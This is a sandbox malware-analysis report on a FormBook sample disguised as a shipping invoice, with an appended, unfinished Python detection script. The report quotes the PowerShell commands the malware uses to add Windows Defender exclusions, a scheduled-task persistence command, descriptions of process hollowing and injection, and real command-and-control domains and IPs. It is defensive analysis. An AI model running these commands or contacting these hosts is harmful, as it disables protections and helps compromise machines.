Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AFF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AEFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AEEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AE849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B914FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B0BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AF746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B0A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B035A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B88DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.premier-moment.info
Source: C:\Windows\explorer.exe | Domain query: www.dinkoistmatrimony.com
Source: C:\Windows\explorer.exe | Domain query: www.vipbrandwatch.info
Source: C:\Windows\explorer.exe | Domain query: www.networkingmaderas.com
Source: C:\Windows\explorer.exe | Domain query: www.curvygirlholiday.com
Source: C:\Windows\explorer.exe | Domain query: www.ecosanhn.com
Source: C:\Windows\explorer.exe | Network Connect: 181.214.142.2 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 107.180.57.119 80
Source: C:\Windows\explorer.exe | Network Connect: 202.254.234.152 80
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: AA0000
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000002.593443753.00000000008B8000.00000004.00000020.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Users\user\Desktop\HAWB AND INV.exe VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation1 | Scheduled Task/Job1 | Process Injection512 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Disable or Modify Tools11 | LSASS Memory | Security Software Discovery431 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion151 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Virtualization/Sandbox Evasion151 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing3 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery112 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction

          Behavior Graph

Behavior Graph ID: 402848
Sample: HAWB AND INV.exe
Start date: 03/05/2021
Architecture: WINDOWS
Score: 100

Contacted hosts shown at the top of the graph: www.jaimericart.com, www.beachrockisland.com, 2 other IPs or domains
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 10 other signatures

Process tree (numbers in brackets are the count badges on the graph nodes):

• HAWB AND INV.exe [7], started
  • Dropped files: C:\Users\user\AppData\...\qxnptkmQbHB.exe (PE32); C:\Users\user\AppData\Local\...\tmp9D41.tmp (XML); C:\Users\user\...\HAWB AND INV.exe.log (ASCII)
  • Signature: Adds a directory exclusion to Windows Defender
  • HAWB AND INV.exe (second instance), started
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe, injected
      • Network: www.premier-moment.info, 202.254.234.152, port 80 (local port 49757), SAKURA-CSAKURAInternetIncJP, Japan; ecosanhn.com, 181.214.142.2, port 80 (local port 49760), ASDETUKhttpwwwheficedcomGB, Chile; 8 other IPs or domains
      • Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
      • ipconfig.exe, started
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  • powershell.exe [26], started
    • conhost.exe, started
  • powershell.exe [24], started
    • conhost.exe, started
  • 2 other processes
    • conhost.exe, started
    • conhost.exe, started
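The chain the graph records (the sample launches PowerShell to add a Defender exclusion, starts a second copy of itself and hollows it, injects explorer.exe, which in turn starts ipconfig.exe, and both injected processes then talk to the C2 hosts) is exactly what a detection engineer wants to recover from endpoint telemetry. The Python below is an added example and is not part of the Joe Sandbox report: the process and network events are constructed to mirror the graph, and the PIDs, the chrome.exe control process and the Add-MpPreference command line are assumptions (the report only records that a directory exclusion was added). Each rule maps to one of the report's signatures; the ipconfig.exe connection is the strongest one, because that binary has no reason to open its own TCP sessions.

```python
"""Flag the FormBook-style execution chain from process and network telemetry.

Added example, not from the Joe Sandbox report. Events are constructed to
mirror the report's behaviour graph; PIDs and the PowerShell command line are
assumed.
"""
import re
from collections import Counter

# Constructed process-creation telemetry (pid, parent pid, image, command line).
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "HAWB AND INV.exe", "cmdline": '"HAWB AND INV.exe"'},
    # Two PowerShell children adding Defender exclusions (command lines assumed).
    {"pid": 110, "ppid": 100, "image": "powershell.exe",
     "cmdline": 'powershell Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'},
    {"pid": 111, "ppid": 100, "image": "powershell.exe",
     "cmdline": 'powershell Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Local\\Temp"'},
    # The sample relaunches itself; the child is the hollowed copy.
    {"pid": 120, "ppid": 100, "image": "HAWB AND INV.exe", "cmdline": '"HAWB AND INV.exe"'},
    # Pre-existing shell process that receives the injected code.
    {"pid": 200, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 210, "ppid": 200, "image": "ipconfig.exe", "cmdline": "ipconfig.exe"},
    # Benign control: a browser the user started from explorer.exe.
    {"pid": 300, "ppid": 200, "image": "chrome.exe", "cmdline": "chrome.exe"},
]

# Constructed outbound connections; the first two use the report's C2 IPs,
# the third is a TEST-NET address standing in for normal browser traffic.
NETWORK_EVENTS = [
    {"pid": 200, "dst_ip": "202.254.234.152", "dst_port": 80},   # www.premier-moment.info
    {"pid": 210, "dst_ip": "181.214.142.2",   "dst_port": 80},   # ecosanhn.com
    {"pid": 300, "dst_ip": "203.0.113.10",    "dst_port": 443},  # benign
]

# Images that never need their own TCP sessions: a connection from one of them
# means foreign code is running inside the process.
NO_NETWORK_IMAGES = {"ipconfig.exe", "conhost.exe", "schtasks.exe"}
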